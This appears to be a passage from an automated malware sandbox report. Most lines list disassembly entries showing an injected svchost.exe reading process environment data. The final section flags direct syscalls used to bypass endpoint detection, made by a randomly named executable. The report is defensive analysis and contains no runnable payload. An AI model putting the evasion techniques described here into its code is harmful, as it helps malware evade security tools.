            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC06F1 mov eax, dword ptr fs:[00000030h]2_2_00BC06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC06F1 mov eax, dword ptr fs:[00000030h]2_2_00BC06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A6C7 mov ebx, dword ptr fs:[00000030h]2_2_00B7A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A6C7 mov eax, dword ptr fs:[00000030h]2_2_00B7A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E627 mov eax, dword ptr fs:[00000030h]2_2_00B5E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B76620 mov eax, dword ptr fs:[00000030h]2_2_00B76620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78620 mov eax, dword ptr fs:[00000030h]2_2_00B78620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4262C mov eax, dword ptr fs:[00000030h]2_2_00B4262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82619 mov eax, dword ptr fs:[00000030h]2_2_00B82619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0866E mov eax, dword ptr fs:[00000030h]2_2_00C0866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0866E mov eax, dword ptr fs:[00000030h]2_2_00C0866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE609 mov eax, dword ptr fs:[00000030h]2_2_00BBE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5260B mov eax, dword ptr fs:[00000030h]2_2_00B5260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B72674 mov eax, dword ptr fs:[00000030h]2_2_00B72674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A660 mov eax, dword ptr fs:[00000030h]2_2_00B7A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A660 mov eax, dword ptr fs:[00000030h]2_2_00B7A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5C640 mov eax, dword ptr fs:[00000030h]2_2_00B5C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B407AF mov eax, dword ptr fs:[00000030h]2_2_00B407AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF47A0 mov eax, dword ptr fs:[00000030h]2_2_00BF47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE678E mov eax, dword ptr fs:[00000030h]2_2_00BE678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B447FB mov eax, dword ptr fs:[00000030h]2_2_00B447FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B447FB mov eax, dword ptr fs:[00000030h]2_2_00B447FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B627ED mov eax, dword ptr fs:[00000030h]2_2_00B627ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE7E1 mov eax, dword ptr fs:[00000030h]2_2_00BCE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4C7C0 mov eax, dword ptr fs:[00000030h]2_2_00B4C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC07C3 mov eax, dword ptr fs:[00000030h]2_2_00BC07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov eax, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov ecx, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7273C mov eax, dword ptr fs:[00000030h]2_2_00B7273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBC730 mov eax, dword ptr fs:[00000030h]2_2_00BBC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C720 mov eax, dword ptr fs:[00000030h]2_2_00B7C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C720 mov eax, dword ptr fs:[00000030h]2_2_00B7C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40710 mov eax, dword ptr fs:[00000030h]2_2_00B40710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70710 mov eax, dword ptr fs:[00000030h]2_2_00B70710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C700 mov eax, dword ptr fs:[00000030h]2_2_00B7C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48770 mov eax, dword ptr fs:[00000030h]2_2_00B48770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50770 mov eax, dword ptr fs:[00000030h]2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE75D mov eax, dword ptr fs:[00000030h]2_2_00BCE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40750 mov eax, dword ptr fs:[00000030h]2_2_00B40750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82750 mov eax, dword ptr fs:[00000030h]2_2_00B82750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82750 mov eax, dword ptr fs:[00000030h]2_2_00B82750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC4755 mov eax, dword ptr fs:[00000030h]2_2_00BC4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov esi, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov eax, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7674D mov eax, dword ptr fs:[00000030h]2_2_00B7674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C108C0 mov eax, dword ptr fs:[00000030h]2_2_00C108C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC89D mov eax, dword ptr fs:[00000030h]2_2_00BCC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A8E4 mov eax, dword ptr fs:[00000030h]2_2_00C0A8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40887 mov eax, dword ptr fs:[00000030h]2_2_00B40887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C8F9 mov eax, dword ptr fs:[00000030h]2_2_00B7C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C8F9 mov eax, dword ptr fs:[00000030h]2_2_00B7C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E8C0 mov eax, dword ptr fs:[00000030h]2_2_00B6E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov ecx, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B62835 mov eax, dword ptr fs:[00000030h]2_2_00B62835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE483A mov eax, dword ptr fs:[00000030h]2_2_00BE483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE483A mov eax, dword ptr fs:[00000030h]2_2_00BE483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A830 mov eax, dword ptr fs:[00000030h]2_2_00B7A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC810 mov eax, dword ptr fs:[00000030h]2_2_00BCC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6870 mov eax, dword ptr fs:[00000030h]2_2_00BD6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6870 mov eax, dword ptr fs:[00000030h]2_2_00BD6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE872 mov eax, dword ptr fs:[00000030h]2_2_00BCE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE872 mov eax, dword ptr fs:[00000030h]2_2_00BCE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B70854 mov eax, dword ptr fs:[00000030h]2_2_00B70854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44859 mov eax, dword ptr fs:[00000030h]2_2_00B44859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44859 mov eax, dword ptr fs:[00000030h]2_2_00B44859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B52840 mov ecx, dword ptr fs:[00000030h]2_2_00B52840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov esi, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov eax, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC89B3 mov eax, dword ptr fs:[00000030h]2_2_00BC89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A9D3 mov eax, dword ptr fs:[00000030h]2_2_00C0A9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B529A0 mov eax, dword ptr fs:[00000030h]2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B409AD mov eax, dword ptr fs:[00000030h]2_2_00B409AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B409AD mov eax, dword ptr fs:[00000030h]2_2_00B409AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B729F9 mov eax, dword ptr fs:[00000030h]2_2_00B729F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B729F9 mov eax, dword ptr fs:[00000030h]2_2_00B729F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCE9E0 mov eax, dword ptr fs:[00000030h]2_2_00BCE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A9D0 mov eax, dword ptr fs:[00000030h]2_2_00B4A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B749D0 mov eax, dword ptr fs:[00000030h]2_2_00B749D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD69C0 mov eax, dword ptr fs:[00000030h]2_2_00BD69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14940 mov eax, dword ptr fs:[00000030h]2_2_00C14940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC892A mov eax, dword ptr fs:[00000030h]2_2_00BC892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD892B mov eax, dword ptr fs:[00000030h]2_2_00BD892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38918 mov eax, dword ptr fs:[00000030h]2_2_00B38918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38918 mov eax, dword ptr fs:[00000030h]2_2_00B38918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC912 mov eax, dword ptr fs:[00000030h]2_2_00BCC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE908 mov eax, dword ptr fs:[00000030h]2_2_00BBE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE908 mov eax, dword ptr fs:[00000030h]2_2_00BBE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC97C mov eax, dword ptr fs:[00000030h]2_2_00BCC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4978 mov eax, dword ptr fs:[00000030h]2_2_00BE4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE4978 mov eax, dword ptr fs:[00000030h]2_2_00BE4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B66962 mov eax, dword ptr fs:[00000030h]2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov eax, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov edx, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B8096E mov eax, dword ptr fs:[00000030h]2_2_00B8096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC0946 mov eax, dword ptr fs:[00000030h]2_2_00BC0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48AA0 mov eax, dword ptr fs:[00000030h]2_2_00B48AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48AA0 mov eax, dword ptr fs:[00000030h]2_2_00B48AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B96AA4 mov eax, dword ptr fs:[00000030h]2_2_00B96AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78A90 mov edx, dword ptr fs:[00000030h]2_2_00B78A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4EA80 mov eax, dword ptr fs:[00000030h]2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14A80 mov eax, dword ptr fs:[00000030h]2_2_00C14A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7AAEE mov eax, dword ptr fs:[00000030h]2_2_00B7AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7AAEE mov eax, dword ptr fs:[00000030h]2_2_00B7AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40AD0 mov eax, dword ptr fs:[00000030h]2_2_00B40AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B74AD0 mov eax, dword ptr fs:[00000030h]2_2_00B74AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B74AD0 mov eax, dword ptr fs:[00000030h]2_2_00B74AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B96ACC mov eax, dword ptr fs:[00000030h]2_2_00B96ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B96ACC mov eax, dword ptr fs:[00000030h]2_2_00B96ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B96ACC mov eax, dword ptr fs:[00000030h]2_2_00B96ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B64A35 mov eax, dword ptr fs:[00000030h]2_2_00B64A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B64A35 mov eax, dword ptr fs:[00000030h]2_2_00B64A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7CA38 mov eax, dword ptr fs:[00000030h]2_2_00B7CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7CA24 mov eax, dword ptr fs:[00000030h]2_2_00B7CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6EA2E mov eax, dword ptr fs:[00000030h]2_2_00B6EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCCA11 mov eax, dword ptr fs:[00000030h]2_2_00BCCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBCA72 mov eax, dword ptr fs:[00000030h]2_2_00BBCA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBCA72 mov eax, dword ptr fs:[00000030h]2_2_00BBCA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7CA6F mov eax, dword ptr fs:[00000030h]2_2_00B7CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7CA6F mov eax, dword ptr fs:[00000030h]2_2_00B7CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7CA6F mov eax, dword ptr fs:[00000030h]2_2_00B7CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEEA60 mov eax, dword ptr fs:[00000030h]2_2_00BEEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46A50 mov eax, dword ptr fs:[00000030h]2_2_00B46A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50A5B mov eax, dword ptr fs:[00000030h]2_2_00B50A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50A5B mov eax, dword ptr fs:[00000030h]2_2_00B50A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50BBE mov eax, dword ptr fs:[00000030h]2_2_00B50BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50BBE mov eax, dword ptr fs:[00000030h]2_2_00B50BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF4BB0 mov eax, dword ptr fs:[00000030h]2_2_00BF4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF4BB0 mov eax, dword ptr fs:[00000030h]2_2_00BF4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48BF0 mov eax, dword ptr fs:[00000030h]2_2_00B48BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48BF0 mov eax, dword ptr fs:[00000030h]2_2_00B48BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48BF0 mov eax, dword ptr fs:[00000030h]2_2_00B48BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6EBFC mov eax, dword ptr fs:[00000030h]2_2_00B6EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCCBF0 mov eax, dword ptr fs:[00000030h]2_2_00BCCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEEBD0 mov eax, dword ptr fs:[00000030h]2_2_00BEEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40BCD mov eax, dword ptr fs:[00000030h]2_2_00B40BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40BCD mov eax, dword ptr fs:[00000030h]2_2_00B40BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B40BCD mov eax, dword ptr fs:[00000030h]2_2_00B40BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B60BCB mov eax, dword ptr fs:[00000030h]2_2_00B60BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B60BCB mov eax, dword ptr fs:[00000030h]2_2_00B60BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B60BCB mov eax, dword ptr fs:[00000030h]2_2_00B60BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0AB40 mov eax, dword ptr fs:[00000030h]2_2_00C0AB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6EB20 mov eax, dword ptr fs:[00000030h]2_2_00B6EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6EB20 mov eax, dword ptr fs:[00000030h]2_2_00B6EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C12B57 mov eax, dword ptr fs:[00000030h]2_2_00C12B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C12B57 mov eax, dword ptr fs:[00000030h]2_2_00C12B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C12B57 mov eax, dword ptr fs:[00000030h]2_2_00C12B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C12B57 mov eax, dword ptr fs:[00000030h]2_2_00C12B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBEB1D mov eax, dword ptr fs:[00000030h]2_2_00BBEB1D
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000AA937 GetProcessHeap,0_2_000AA937
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A8E19 SetUnhandledExceptionFilter,0_2_000A8E19
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000A8E3C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
